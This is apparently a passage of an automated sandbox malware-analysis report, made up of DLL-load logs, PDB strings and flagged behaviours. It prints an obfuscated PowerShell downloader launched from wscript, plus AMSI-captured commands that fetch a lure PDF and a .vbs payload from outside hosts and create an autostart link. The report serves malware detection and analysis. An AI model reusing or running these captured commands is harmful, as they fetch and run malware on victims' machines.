          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb'J source: powershell.exe, 00000003.00000002.2189957906.000001DAB563D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2220195093.000001DACF904000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: 6?m.pdbpdbtem.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2412345329.0000023976E45000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.pdbe source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbn source: powershell.exe, 00000000.00000002.2414714485.0000023977170000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2414714485.000002397712C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3496836394.00000263D8BFC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdb" source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdbk source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.2412345329.0000023976EAB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.2219771232.000001DACF8A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D89F4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\System.pdbc source: powershell.exe, 00000007.00000002.3493312845.00000263D8A09000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3496836394.00000263D8C5A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000007.00000002.3493312845.00000263D8A59000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. Col
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne Undramatisables Ingrid130 Linjetegnings Crackajack Orloven Parches Syllid Idrtsparkerne Postoffice169 Renlyds landevejenes Persecuted Postsigmoid Ehretia Koersel Klippehuler Boblepaknings Regalness Kldebons Irritative Assurancesvigens Genecologically149 Parulis strygerullerne';$Undsatdeoglyph = 1;Function Psykopaterne($Spleenens){$Diastem=$Spleenens.Length-$Undsatdeoglyph;$Noiler='SUBSTRIN';$Noiler+='G';For( $Undsat=5;$Undsat -lt $Diastem;$Undsat+=6){$Undramatisables+=$Spleenens.$Noiler.Invoke( $Undsat, $Undsatdeoglyph);}$Undramatisables;}function responsibly($Intraovarian129){ & ($Forgyldte) ($Intraovarian129);}$Skovtrernes=Psykopaterne 'nonamMHaydooDygtizCadeaiApplal Appel Mokkarepor/ Inds5Frak .Unde 0Talam W gsu(HappiWNonauiIrresnvivifd,ssocoTraktw,oressRabar SphecN fashTNonr, Kansa1Bes,t0Theop.Maint0Vap r; Bunt a.goWMaskei Pa.rnL.nia6S.ven4Syste;Petal VisoxAfg e6 Proc4Modst;Sanit Arm,nrOrdfovZ,nag: ista1Uvaer2Stopf1Sixti.Skrav0 Re.o)Photo Ga esGBagsteOvergc Cr.tkQuadroDoggi/thaum2 Vald0Amt,b1Physi0 Isse0N.gle1Phaet0Subco1Stigr SweeFSki.oiFin,erm duleK aphfGeneroClangx frem/Prale1Unsea2,ncul1 Caus.P.dio0S.asi ';$Hir=Psykopaterne 'PipesUnonresTmrerePernarUn ha-r,ferABiplag O hee RingnSixtytevent ';$Orloven=Psykopaterne 'DatabhUncoutNoncotfornupC,mpas Prad:Kodni/ .ypo/UnspiwAfmgtwArtifwPerfe. HolgeConfer,wirpph gga-Twi.erSkulaoStiftySpir,aProfilTvrli-Uni,pcTid.arPi gioReptiw PuttnAn id. DediiChadondeflofIndesoAcras/ PrdiwLenshhHotbr/CatapSStempa nagorGuleroVaabetChesthByggerLan,bu Vi,kmtrich.Adva,jLon.opvermibCamph> He.uhGarant ForbtBlamapItalisGypso: Must/Di ci/ Methw Undewforurw,ipse.Prom aPar.plSlmnimMobedr ConswVejgra,rogrd Togf.Barsecpara oStjdemCitat/Anywhw CholhSkaks/StyreS SwotaSheikrRutebo Sub.tVestshS,regr,emicuSepalmGela.. StikjNiddepSilicbLgnag ';$Syndsbekendelsens=Psykopaterne ' Insk>Strou ';$Forgyldte=Psykopaterne 'ShoppiMeasueEtta,xpoo.a ';$grydeskeers='Idrtsparkerne';$Advoker = Psykopaterne 'EftereGr,ndc StrihSa,lioDeta. Stad%RecidaGainspUlyksp Ud rd ilmna,glertForhaa M,no%Renai\.igenA.onathLandfoHash rSupponTrykitHailerL,cie.Slid.P Av.siTr,kabUnexo Bildk&Super&Sig l skyfoeSha.ec Rabah,ragioUnder OverftDisbr ';responsibly (Psykopaterne 'Farin$CyclogkontrlFr.byoCity,bRaakoaTematlNy.ed: A arBEpipto NitreLabourMilieeCla,s=Stran(,ragecOve hmI,terd,husc Va.df/Deminc.rape do b$OutbeA,udsedTu.thv.ttitoTalsykstab,e Outfrc alo)Res u ');responsibly (Psykopaterne 'Kalor$ E ebgAp.relKnn,soephyrbNa,uaaHonorlCompu: ,elgCF.rstrBayera Plumc,orthkConflaBrndsjStu saSvag,cIndl.kAbiga= Co e$.merkOBagvar ,rnelFolieoSyn ev,ngore Overn fluo. ColJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27557 pushad ; retf 0_2_00007FF848F2755D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F26D77 push esp; retf 0_2_00007FF848F26D78
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27977 push esp; retf 0_2_00007FF848F27978
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F27407 push ds; retf 0_2_00007FF848F2740F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848FF7613 push edi; ret 0_2_00007FF848FF7616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF848FE0D6C push eax; ret 3_2_00007FF848FE0D6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848F27C57 push esp; retf 7_2_00007FF848F27C58

          Boot Survival

          barindex
          Powershell creates an autostart link
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htb09www.fornid.com/wh/List%20of%20rzmhquirzmhd%20itzmhms%20and%20szmhrviczmhs.pdf';getit -fz $flol -oulv 'htb09www.pinzmhapplzmhtzmhch.azmh/ov/wh.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
